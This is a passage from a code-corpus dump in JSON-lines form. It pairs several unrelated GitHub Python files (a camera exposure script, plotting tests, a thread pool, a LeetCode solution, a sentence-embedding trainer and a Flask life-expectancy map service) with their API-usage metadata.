"line_number": 51, "usage_type": "name"}, {"api_name": "bikesharing.models.Station.objects.all", "line_number": 52, "usage_type": "call"}, {"api_name": "bikesharing.models.Station.objects", "line_number": 52, "usage_type": "attribute"}, {"api_name": "bikesharing.models.Station", "line_number": 52, "usage_type": "name"}, {"api_name": "serializers.StationSerializer", "line_number": 53, "usage_type": "name"}, {"api_name": "rest_framework.permissions.BasePermission", "line_number": 56, "usage_type": "name"}, {"api_name": "rest_framework.permissions.SAFE_METHODS", "line_number": 65, "usage_type": "name"}, {"api_name": "rest_framework.permissions.BasePermission", "line_number": 71, "usage_type": "name"}, {"api_name": "rest_framework.mixins.CreateModelMixin", "line_number": 84, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 84, "usage_type": "name"}, {"api_name": "rest_framework.mixins.RetrieveModelMixin", "line_number": 85, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 85, "usage_type": "name"}, {"api_name": "rest_framework.mixins.ListModelMixin", "line_number": 86, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 86, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.GenericViewSet", "line_number": 87, "usage_type": "attribute"}, {"api_name": 
"rest_framework.viewsets", "line_number": 87, "usage_type": "name"}, {"api_name": "serializers.CreateRentSerializer", "line_number": 91, "usage_type": "name"}, {"api_name": "serializers.RentSerializer", "line_number": 93, "usage_type": "name"}, {"api_name": "bikesharing.models.Rent.objects.filter", "line_number": 97, "usage_type": "call"}, {"api_name": "bikesharing.models.Rent.objects", "line_number": 97, "usage_type": "attribute"}, {"api_name": "bikesharing.models.Rent", "line_number": 97, "usage_type": "name"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 101, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 101, "usage_type": "name"}, {"api_name": "bikesharing.models.Bike.State", "line_number": 106, "usage_type": "attribute"}, {"api_name": "bikesharing.models.Bike", "line_number": 106, "usage_type": "name"}, {"api_name": "cykel.models.CykelLogEntry.objects.create", "line_number": 111, "usage_type": "call"}, {"api_name": "cykel.models.CykelLogEntry.objects", "line_number": 111, "usage_type": "attribute"}, {"api_name": "cykel.models.CykelLogEntry", "line_number": 111, "usage_type": "name"}, {"api_name": "serializers.RentSerializer", "line_number": 118, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 120, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 121, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 121, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 132, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_403_PERMISSON_DENIED", "line_number": 134, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 134, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 137, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_410_GONE", "line_number": 138, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 138, "usage_type": "name"}, {"api_name": "bikesharing.models.Location.objects.create", "line_number": 143, "usage_type": "call"}, {"api_name": "bikesharing.models.Location.objects", "line_number": 143, "usage_type": "attribute"}, {"api_name": "bikesharing.models.Location", "line_number": 143, "usage_type": "name"}, {"api_name": "bikesharing.models.Location.Source", "line_number": 145, "usage_type": "attribute"}, {"api_name": "bikesharing.models.Location", "line_number": 145, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 146, "usage_type": "call"}, {"api_name": "django.contrib.gis.geos.Point", "line_number": 147, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 152, "usage_type": "call"}, {"api_name": "rest_framework.decorators.action", "line_number": 124, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 159, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_403_PERMISSON_DENIED", "line_number": 161, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 161, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 165, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_410_GONE", "line_number": 166, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 166, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 173, 
"usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 175, "usage_type": "call"}, {"api_name": "rest_framework.decorators.action", "line_number": 154, "usage_type": "call"}, {"api_name": "rest_framework.decorators.permission_classes", "line_number": 82, "usage_type": "call"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 82, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 183, "usage_type": "call"}, {"api_name": "bikesharing.models.LocationTracker.objects.get", "line_number": 185, "usage_type": "call"}, {"api_name": "bikesharing.models.LocationTracker.objects", "line_number": 185, "usage_type": "attribute"}, {"api_name": "bikesharing.models.LocationTracker", "line_number": 185, "usage_type": "name"}, {"api_name": "bikesharing.models.LocationTracker.DoesNotExist", "line_number": 186, "usage_type": "attribute"}, {"api_name": "bikesharing.models.LocationTracker", "line_number": 186, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 187, "usage_type": "call"}, {"api_name": "serializers.LocationTrackerUpdateSerializer", "line_number": 189, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 191, "usage_type": "call"}, {"api_name": "bikesharing.models.Location", "line_number": 201, "usage_type": "call"}, {"api_name": "bikesharing.models.Location.Source", "line_number": 202, "usage_type": "attribute"}, {"api_name": "bikesharing.models.Location", "line_number": 202, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 203, "usage_type": "call"}, {"api_name": "django.contrib.gis.geos.Point", "line_number": 205, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 215, "usage_type": "call"}, {"api_name": "preferences.preferences.BikeSharePreferences", "line_number": 220, "usage_type": "attribute"}, {"api_name": "preferences.preferences", "line_number": 220, "usage_type": "name"}, {"api_name": "bikesharing.models.Station.objects.filter", "line_number": 221, "usage_type": "call"}, {"api_name": "bikesharing.models.Station.objects", "line_number": 221, "usage_type": "attribute"}, {"api_name": "bikesharing.models.Station", "line_number": 221, "usage_type": "name"}, {"api_name": "django.contrib.gis.measure.D", "line_number": 222, "usage_type": "call"}, {"api_name": "bikesharing.models.Station.Status", "line_number": 223, "usage_type": "attribute"}, {"api_name": "bikesharing.models.Station", "line_number": 223, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 232, "usage_type": "call"}, {"api_name": "django.utils.timezone.timedelta", "line_number": 232, "usage_type": "call"}, {"api_name": "bikesharing.models.LocationTracker.Status", "line_number": 237, "usage_type": "attribute"}, {"api_name": "bikesharing.models.LocationTracker", "line_number": 237, "usage_type": "name"}, {"api_name": "cykel.models.CykelLogEntry.create_unless_time", "line_number": 239, "usage_type": "call"}, {"api_name": "cykel.models.CykelLogEntry", "line_number": 239, "usage_type": "name"}, {"api_name": "bikesharing.models.Bike.State", "line_number": 243, "usage_type": "attribute"}, {"api_name": "bikesharing.models.Bike", "line_number": 243, "usage_type": "name"}, {"api_name": "cykel.models.CykelLogEntry.create_unless_time", "line_number": 245, "usage_type": "call"}, {"api_name": "cykel.models.CykelLogEntry", "line_number": 245, "usage_type": "name"}, {"api_name": 
"rest_framework.response.Response", "line_number": 253, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 255, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 178, "usage_type": "call"}, {"api_name": "rest_framework.decorators.permission_classes", "line_number": 179, "usage_type": "call"}, {"api_name": "rest_framework_api_key.permissions.HasAPIKey", "line_number": 179, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.ViewSet", "line_number": 262, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 262, "usage_type": "name"}, {"api_name": "bikesharing.models.Bike.objects.filter", "line_number": 265, "usage_type": "call"}, {"api_name": "bikesharing.models.Bike.objects", "line_number": 265, "usage_type": "attribute"}, {"api_name": "bikesharing.models.Bike", "line_number": 265, "usage_type": "name"}, {"api_name": "serializers.MaintenanceBikeSerializer", "line_number": 266, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 267, "usage_type": "call"}, {"api_name": "rest_framework.decorators.action", "line_number": 263, "usage_type": "call"}, {"api_name": "rest_framework.decorators.action", "line_number": 269, "usage_type": "call"}, {"api_name": "rest_framework.decorators.authentication_classes", "line_number": 258, "usage_type": "call"}, {"api_name": "rest_framework.authentication.SessionAuthentication", "line_number": 259, "usage_type": "name"}, {"api_name": "rest_framework.authentication.TokenAuthentication", "line_number": 259, "usage_type": "name"}, {"api_name": "authentication.BasicTokenAuthentication", "line_number": 259, "usage_type": "name"}, {"api_name": "rest_framework.decorators.permission_classes", "line_number": 261, "usage_type": "call"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 261, "usage_type": "name"}, {"api_name": "rest_framework.generics.RetrieveAPIView", "line_number": 275, "usage_type": "attribute"}, {"api_name": "rest_framework.generics", "line_number": 275, "usage_type": "name"}, {"api_name": "serializers.UserDetailsSerializer", "line_number": 282, "usage_type": "name"}, {"api_name": "rest_framework.decorators.permission_classes", "line_number": 283, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 283, "usage_type": "name"}, {"api_name": "django.contrib.auth.get_user_model", "line_number": 291, "usage_type": "call"}, {"api_name": "rest_framework.mixins.ListModelMixin", "line_number": 296, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 296, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.GenericViewSet", "line_number": 297, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 297, "usage_type": "name"}, {"api_name": "serializers.SocialAppSerializer", "line_number": 301, "usage_type": "name"}, {"api_name": "allauth.socialaccount.models.SocialApp.objects.filter", "line_number": 304, "usage_type": "call"}, {"api_name": "allauth.socialaccount.models.SocialApp.objects", "line_number": 304, "usage_type": "attribute"}, {"api_name": "allauth.socialaccount.models.SocialApp", "line_number": 304, "usage_type": "name"}, {"api_name": "django.contrib.sites.shortcuts.get_current_site", "line_number": 304, "usage_type": "call"}, {"api_name": "rest_framework.decorators.permission_classes", "line_number": 294, "usage_type": "call"}, {"api_name": 
"rest_framework.permissions.AllowAny", "line_number": 294, "usage_type": "name"}, {"api_name": "django.utils.feedgenerator.Rss201rev2Feed", "line_number": 307, "usage_type": "name"}, {"api_name": "django.utils.feedgenerator.Rss201rev2Feed", "line_number": 309, "usage_type": "argument"}, {"api_name": "django.contrib.syndication.views.Feed", "line_number": 352, "usage_type": "name"}, {"api_name": "preferences.preferences.BikeSharePreferences", "line_number": 356, "usage_type": "attribute"}, {"api_name": "preferences.preferences", "line_number": 356, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 362, "usage_type": "call"}, {"api_name": "cykel.models.CykelLogEntry._meta", "line_number": 364, "usage_type": "attribute"}, {"api_name": "cykel.models.CykelLogEntry", "line_number": 364, "usage_type": "name"}, {"api_name": "cykel.models.CykelLogEntry.objects.order_by", "line_number": 368, "usage_type": "call"}, {"api_name": "cykel.models.CykelLogEntry.objects", "line_number": 368, "usage_type": "attribute"}, {"api_name": "cykel.models.CykelLogEntry", "line_number": 368, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 373, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 398, "usage_type": "call"}, {"api_name": "cykel.models.CykelLogEntry.objects.order_by", "line_number": 406, "usage_type": "call"}, {"api_name": "cykel.models.CykelLogEntry.objects", "line_number": 406, "usage_type": "attribute"}, {"api_name": "cykel.models.CykelLogEntry", "line_number": 406, "usage_type": "name"}, {"api_name": "rest_framework.views.exception_handler", "line_number": 410, "usage_type": "call"}, {"api_name": "rest_framework.exceptions.APIException", "line_number": 415, "usage_type": "attribute"}, {"api_name": "rest_framework.exceptions", "line_number": 415, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 442, "usage_type": "call"}]} +{"seq_id": "15514557452", "text": "import cv2 #Highly overkill I think\nfrom vimba import *\nfrom time import sleep\nimport numpy as np\nfrom PIL import Image \n\ndef take_image(cam_id, f_name): #Takes a singular picture with chosen camera and saves it as \".jpg\"\n with vimba.get_camera_by_id(cam_id) as cam:\n frame = cam.get_frame()\n frame.convert_pixel_format(PixelFormat.Mono8) #This sets the camera to use Mono8 (8-bit image [monochrome?])\n cv2.imwrite (f'{f_name}.jpg ', frame.as_opencv_image()) #Just a ludacrious way of storing the image? 
Seems like it\n #Ok, now lets assume this then just saves an image as a jpg\n\ndef find_exposure_time(initial_guess, cam_id): #Figures out the optimal exposure time, sets the camera to it and returns it\n exposure_time = initial_guess\n max_pixel = 256 #Just an initial value to make the while loop start\n img_name = 'for_exp_time'\n print('start')\n with vimba.get_camera_by_id(cam_id) as cam:\n increment = cam.ExposureTime.get_increment()\n while(np.abs(max_pixel-230) > 20): #Somewhat quick changes to get a fairly good exposure time\n if(max_pixel < 230): exposure_time = exposure_time + ((exposure_time*0.1)//increment)*increment #Increases exposure time ~10% but ensures that it is done in a whole number of increments\n elif(max_pixel > 230): exposure_time = exposure_time - ((exposure_time*0.1)//increment)*increment #Same as above, just lowering this time\n cam.ExposureTime.set(exposure_time)\n take_image(cam_id, img_name)\n pixel_values = np.asarray(Image.open(f'{img_name}.jpg'))\n max_pixel = np.max(pixel_values)\n print(f'rough time found: {exposure_time}')\n\n if(max_pixel < 230): #Slow and incremental changes to exposure time, so we can find the optimal one\n tmp_max_pixel = max_pixel + 1\n while(tmp_max_pixel > max_pixel and tmp_max_pixel <= 230):\n exposure_time += 1\n cam.ExposureTime.set(exposure_time)\n take_image(cam_id, img_name)\n pixel_values = np.asarray(Image.open(f'{img_name}.jpg'))\n max_pixel = np.max(pixel_values)\n exposure_time -= 1\n elif(max_pixel > 230):\n tmp_max_pixel = max_pixel - 1\n while(max_pixel > 230 and tmp_max_pixel >= 230):\n exposure_time -= 1\n cam.ExposureTime.set(exposure_time)\n take_image(cam_id, img_name)\n pixel_values = np.asarray(Image.open(f'{img_name}.jpg'))\n max_pixel = np.max(pixel_values)\n exposure_time += 1\n print(f'Optimal time found: {exposure_time}')\n cam.ExposureTime.set(exposure_time)\n return(exposure_time)\n\n\ndef main():\n with Vimba.get_instance() as vimba:\n front_camera_id = 'djlefakjlkjd' #The IDs are just placeholders as I do not know the actual IDs\n top_camera_id = 'klajsflsaj'\n\n for i in range(10): #just to check that nothing fucked happens (within a minute at least).\n print(f'test {i}: front camera is {front_camera} and top camera is {top_camera}')\n sleep(6)\n take_image(front_camera, 'test') #Takes a test image with the front camera\n\nif __name__ == '__main__':\n main()\n", "repo_name": "CThyness/Nanophotonics_II", "sub_path": "test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 3288, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "vimba.get_camera_by_id", "line_number": 8, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 11, "usage_type": "call"}, {"api_name": "vimba.get_camera_by_id", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 26, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 26, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 26, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 36, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 36, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 36, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 
45, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 45, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 45, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 46, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 60, "usage_type": "call"}]} +{"seq_id": "19653485599", "text": "import os\nfrom unittest import mock\n\nimport numpy as np\nimport pytest\n\n\ndef test_add_coastlines_help():\n from polar2grid.add_coastlines import main\n\n with pytest.raises(SystemExit) as e:\n main([\"--help\"])\n assert e.value.code == 0\n\n\ndef _create_fake_l_geotiff(fp):\n import rasterio\n\n kwargs = {\n \"driver\": \"GTiff\",\n \"height\": 1000,\n \"width\": 500,\n \"count\": 1,\n \"dtype\": np.uint8,\n \"crs\": \"+proj=latlong\",\n \"transform\": (0.033, 0.0, 0.0, 0.0, 0.033, 0.0),\n }\n with rasterio.open(fp, \"w\", **kwargs) as ds:\n ds.write(np.zeros((500, 1000), dtype=np.uint8), 1)\n\n\n@mock.patch(\"polar2grid.add_coastlines.ContourWriterAGG.add_overlay_from_dict\")\ndef test_add_coastlines_basic_l(add_overlay_mock, tmp_path):\n from polar2grid.add_coastlines import main\n\n fp = str(tmp_path / \"test.tif\")\n _create_fake_l_geotiff(fp)\n ret = main([\"--add-coastlines\", \"--add-colorbar\", fp])\n assert ret in [None, 0]\n assert os.path.isfile(tmp_path / \"test.png\")\n add_overlay_mock.assert_called_once()\n assert \"coasts\" in add_overlay_mock.call_args.args[0]\n", "repo_name": "cloudsillusions/polar2grid", "sub_path": "polar2grid/tests/test_add_coastlines.py", "file_name": "test_add_coastlines.py", "file_ext": "py", "file_size_in_byte": 1134, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "pytest.raises", "line_number": 11, "usage_type": "call"}, {"api_name": "polar2grid.add_coastlines.main", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 24, "usage_type": "attribute"}, {"api_name": "rasterio.open", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 29, "usage_type": "attribute"}, {"api_name": "polar2grid.add_coastlines.main", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "unittest.mock.patch", "line_number": 32, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 32, "usage_type": "name"}]} +{"seq_id": "39270921333", "text": "import threading\nfrom collections.abc import Callable\nfrom queue import Queue, Empty\nfrom typing import NamedTuple, Any\n\n\nclass QueueItem(NamedTuple):\n func: Callable\n arg: Any\n\n\nclass ThreadPool:\n def __init__(self, num_threads: int):\n self.input: Queue[QueueItem] = Queue()\n self.output = Queue()\n self.running = True\n self.input_count = 0\n self.processing_count = 0\n self.output_count = 0\n self.count_lock = threading.Lock()\n\n self.threads = [threading.Thread(target=self.consumer) for _ in range(num_threads)]\n for t in self.threads:\n t.start()\n\n def __repr__(self):\n return f'ThreadPool(input_count={self.input_count}, processing_count={self.processing_count}, output_count={self.output_count})'\n\n def __len__(self):\n with self.count_lock:\n return self.input_count + self.processing_count + self.output_count\n\n def __iter__(self):\n while len(self) > 0 and self.running:\n try:\n out = 
self.output.get(block=True, timeout=1)\n self.output.task_done()\n with self.count_lock:\n self.output_count -= 1\n yield out\n except Empty:\n pass\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.join()\n\n def join(self):\n self.input.join()\n self.running = False\n for t in self.threads:\n t.join()\n\n def add_item(self, func, arg):\n self.input.put(QueueItem(func, arg))\n with self.count_lock:\n self.input_count += 1\n\n def get_item(self):\n out = self.output.get()\n self.output.task_done()\n with self.count_lock:\n self.output_count -= 1\n return out\n\n def consumer(self):\n while self.running:\n try:\n item = self.input.get(block=True, timeout=1)\n with self.count_lock:\n self.input_count -= 1\n self.processing_count += 1\n self.output.put(item.func(item.arg))\n self.input.task_done()\n with self.count_lock:\n self.processing_count -= 1\n self.output_count += 1\n except Empty:\n pass\n", "repo_name": "KathrynPanger/bbd", "sub_path": "src/bbd/github_data_extractor/threadpool.py", "file_name": "threadpool.py", "file_ext": "py", "file_size_in_byte": 2360, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.NamedTuple", "line_number": 7, "usage_type": "name"}, {"api_name": "collections.abc.Callable", "line_number": 8, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 9, "usage_type": "name"}, {"api_name": "queue.Queue", "line_number": 14, "usage_type": "name"}, {"api_name": "queue.Queue", "line_number": 15, "usage_type": "call"}, {"api_name": "threading.Lock", "line_number": 20, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 22, "usage_type": "call"}, {"api_name": "queue.Empty", "line_number": 41, "usage_type": "name"}, {"api_name": "queue.Empty", "line_number": 80, "usage_type": "name"}]} +{"seq_id": "73982554729", "text": "#\n# @lc app=leetcode id=2218 lang=python3\n#\n# [2218] Maximum Value of K Coins From Piles\n#\n\n# @lc code=start\nfrom functools import cache\nfrom typing import List\n\n\nclass Solution:\n def maxValueOfCoins(self, piles: List[List[int]], k: int) -> int:\n @cache\n def dp(i, coin_to_collect):\n '''\n @param:\n i : choose only the pile starting from i \n '''\n if i == len(piles) or coin_to_collect == 0:\n return 0\n ret, curr = dp(i+1, coin_to_collect), 0\n\n for _i, x in enumerate(piles[i]):\n if coin_to_collect-1-_i < 0:\n break\n curr += x\n ret = max(dp(i+1, coin_to_collect-(_i + 1)) + curr, ret)\n return ret\n return dp(0, k)\n\n# @lc code=end\n", "repo_name": "benntuecon/Leetcode-prac", "sub_path": "2218.maximum-value-of-k-coins-from-piles.py", "file_name": "2218.maximum-value-of-k-coins-from-piles.py", "file_ext": "py", "file_size_in_byte": 824, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.List", "line_number": 13, "usage_type": "name"}, {"api_name": "functools.cache", "line_number": 14, "usage_type": "name"}]} +{"seq_id": "42185950529", "text": "import os\r\n# os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1\"\r\nimport sys\r\nsys.path.append(\"D:/Meredith/TaskB\")\r\nimport csv\r\nimport gzip\r\nimport xml.dom.minidom\r\nimport math\r\nfrom datetime import datetime\r\nfrom torch.utils.data import DataLoader\r\n\r\nfrom sklearn.metrics.pairwise import paired_cosine_distances\r\n# from datasets import load_dataset\r\nfrom transformers import AutoTokenizer,AutoModel,BertConfig,BertModel\r\nimport numpy as 
np\r\n\r\nfrom transformers.models.bert import BertTokenizer\r\nfrom transformers import AdamW,get_linear_schedule_with_warmup\r\n\r\n# from sentence_transformers.evaluation import EmbeddingSimilarityEvaluator\r\nfrom typing import Union, Tuple, List, Iterable, Dict, Callable\r\nfrom data_CoSENT import load_ENdata,load_PTdata,CustomDataset,collate_fn,pad_to_maxlen\r\n\r\nfrom utils import evaluate,get_similarity,prepare_data,get_devSimilarity,write_csv,evaluate_submission,insert_to_submission1,writeList_csv,set_seed\r\nfrom torch import nn\r\n\r\n# from transformers import InputExample\r\nfrom torch.utils.data import Dataset\r\nimport random\r\nimport torch\r\nimport argparse\r\n\r\n#本部分来自https://github.com/shawroad/CoSENT_Pytorch\r\ndef calc_loss(y_true,y_pred):\r\n #取出真实标签\r\n y_true=y_true[::2]\r\n #对输出的句子向量进行l2归一化 后面只需要对应位相乘就可以得到cos值\r\n norms=(y_pred**2).sum(axis=1,keepdims=True)**0.5\r\n y_pred=y_pred/norms\r\n #奇偶向量相乘\r\n y_pred=torch.sum(y_pred[::2]*y_pred[1::2],dim=1)*20\r\n y_1=y_pred[:,None]\r\n y_2=y_pred[None,:]\r\n y_pred=y_1-y_2#两两之间的余弦差值\r\n #矩阵中的第i行第j列 表示的是第i个余弦值-第j个余弦值\r\n y_true=y_true[:,None] load it and return its content\r\n if os.path.exists(cachefile):\r\n with open(cachefile, 'rb') as cachehandle:\r\n print(\"using cached result from '%s'\" % cachefile)\r\n return pickle.load(cachehandle)\r\n\r\n # execute the function with all arguments passed\r\n res = fn(*args, **kwargs)\r\n\r\n # write to cache file\r\n with open(cachefile, 'wb') as cachehandle:\r\n print(\"saving result to cache '%s'\" % cachefile)\r\n pickle.dump(res, cachehandle)\r\n\r\n return res\r\n\r\n return wrapped\r\n\r\n return decorator # return this \"customized\" decorator that uses \"cachefile\"\r\n\r\n@cached('tracts_disparity.pickle')\r\ndef load_data():\r\n lfe = pd.read_csv('data/US_A.CSV')[['Tract ID', 'e(0)']] \\\r\n .rename(index=str, \r\n columns={'Tract ID': 'GEOID', \r\n 'e(0)':'life_expectancy'})\r\n lfe['GEOID'] = lfe['GEOID'].astype(str)\r\n gdf = gpd.read_file('data/geo/tracts/usa_tracts.shp')[['GEOID','geometry']]\r\n gdf = gdf.merge(lfe).set_index('GEOID')\r\n\r\n swm = ps.weights.Rook.from_dataframe(gdf)\r\n tract_to_neighbors = swm.neighbors\r\n\r\n fips_to_lfe = dict(zip(lfe['GEOID'].astype(str), lfe['life_expectancy']))\r\n\r\n g = nx.Graph()\r\n g.add_nodes_from(gdf.index)\r\n\r\n for tract, neighbors in tract_to_neighbors.items():\r\n avail_tracts = fips_to_lfe.keys()\r\n # some tracts don't seem to show up in the life expectancy dataset\r\n # these may be tracts with no population\r\n if tract in avail_tracts:\r\n for neighbor in neighbors:\r\n if neighbor in avail_tracts:\r\n tract_lfe = fips_to_lfe[tract]\r\n neighbor_lfe = fips_to_lfe[neighbor]\r\n disparity = abs(tract_lfe - neighbor_lfe)\r\n g.add_edge(tract, neighbor, disparity=disparity)\r\n # remove the node from the graph if the node is not in the life\r\n # expectancy dataset\r\n elif tract in g.nodes:\r\n g.remove_node(tract)\r\n\r\n sorted_list = sorted(g.edges(data=True), key=lambda x: x[2]['disparity'], reverse=True)\r\n\r\n return lfe, sorted_list, gdf\r\n\r\n\r\nlife_expectancy = Blueprint('life_expectancy', __name__, template_folder='templates')\r\n\r\n@life_expectancy.route('/folium')\r\n# read config file and return json to the client!\r\ndef get_map():\r\n limit = request.args.get('limit')\r\n lfe, sorted_list, gdf = load_data()\r\n\r\n top_50 = sorted_list[:int(limit)]\r\n top_50_tracts = []\r\n for t in top_50:\r\n if t[0] not in top_50_tracts:\r\n top_50_tracts.append(t[0])\r\n if t[1] not in 
top_50_tracts:\r\n top_50_tracts.append(t[1])\r\n\r\n \r\n top_50_tracts_gdf = gdf[gdf.index.isin(top_50_tracts)].reset_index()[['GEOID', 'geometry', 'life_expectancy']]\r\n top_50_tracts_gdf.to_file('selected_tracts.geojson', driver='GeoJSON')\r\n\r\n\r\n m = folium.Map(tiles='cartodbpositron', min_zoom=4, zoom_start=4.25, \r\n max_bounds=True,location=[33.8283459,-98.5794797],\r\n min_lat=5.499550, min_lon=-160.276413, \r\n max_lat=83.162102, max_lon=-52.233040)\r\n marker_cluster = MarkerCluster(\r\n options = {'maxClusterRadius':15, \r\n 'disableCusteringAtZoom':5, \r\n 'singleMarkerMode':True}).add_to(m)\r\n folium.Choropleth(\r\n geo_data = 'selected_tracts.geojson',\r\n data = lfe,\r\n columns = ['GEOID','life_expectancy'],\r\n fill_color = 'YlGn',\r\n key_on = 'feature.properties.GEOID',\r\n name = 'geojson',\r\n legend_name='Life Expectancy'\r\n ).add_to(m)\r\n\r\n for i, tract in top_50_tracts_gdf.iterrows():\r\n x = tract.geometry.centroid.x\r\n y = tract.geometry.centroid.y\r\n l = tract.life_expectancy\r\n folium.CircleMarker([y, x], radius=8, color='black', \r\n fill_color='white', fill_opacity=0.5, \r\n tooltip='Life expectancy: {}'.format(str(l))).add_to(marker_cluster)\r\n \r\n f = folium.Figure()\r\n title = '
Does your census tract determine how ' + \\\r\n          'long you will live?'\r\n    subtitle = 'Census tract neighbors across ' + \\\r\n             'the U.S. with the widest disparities ' + \\\r\n             'in life expectancy
'\r\n f.html.add_child(folium.Element(title))\r\n f.html.add_child(folium.Element(subtitle))\r\n f.add_child(m)\r\n\r\n # not sure if this works\r\n # data = {'html': f.html}\r\n # if it does not, you can save the file and read it as text\r\n f.save(\"map.html\")\r\n file = open(\"map.html\", \"r\") \r\n data = {'html': file.read()}\r\n \r\n return jsonify(data)\r\n", "repo_name": "pramod-thaz/xls_manager", "sub_path": "services/analytics/life_expectancy.py", "file_name": "life_expectancy.py", "file_ext": "py", "file_size_in_byte": 5372, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.exists", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "pickle.load", "line_number": 21, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 29, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 39, "usage_type": "call"}, {"api_name": "geopandas.read_file", "line_number": 44, "usage_type": "call"}, {"api_name": "pysal.weights.Rook.from_dataframe", "line_number": 47, "usage_type": "call"}, {"api_name": "pysal.weights", "line_number": 47, "usage_type": "attribute"}, {"api_name": "networkx.Graph", "line_number": 52, "usage_type": "call"}, {"api_name": "flask.Blueprint", "line_number": 76, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 81, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 81, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 81, "usage_type": "name"}, {"api_name": "folium.Map", "line_number": 97, "usage_type": "call"}, {"api_name": "folium.plugins.MarkerCluster", "line_number": 101, "usage_type": "call"}, {"api_name": "folium.Choropleth", "line_number": 105, "usage_type": "call"}, {"api_name": "folium.CircleMarker", "line_number": 119, "usage_type": "call"}, {"api_name": 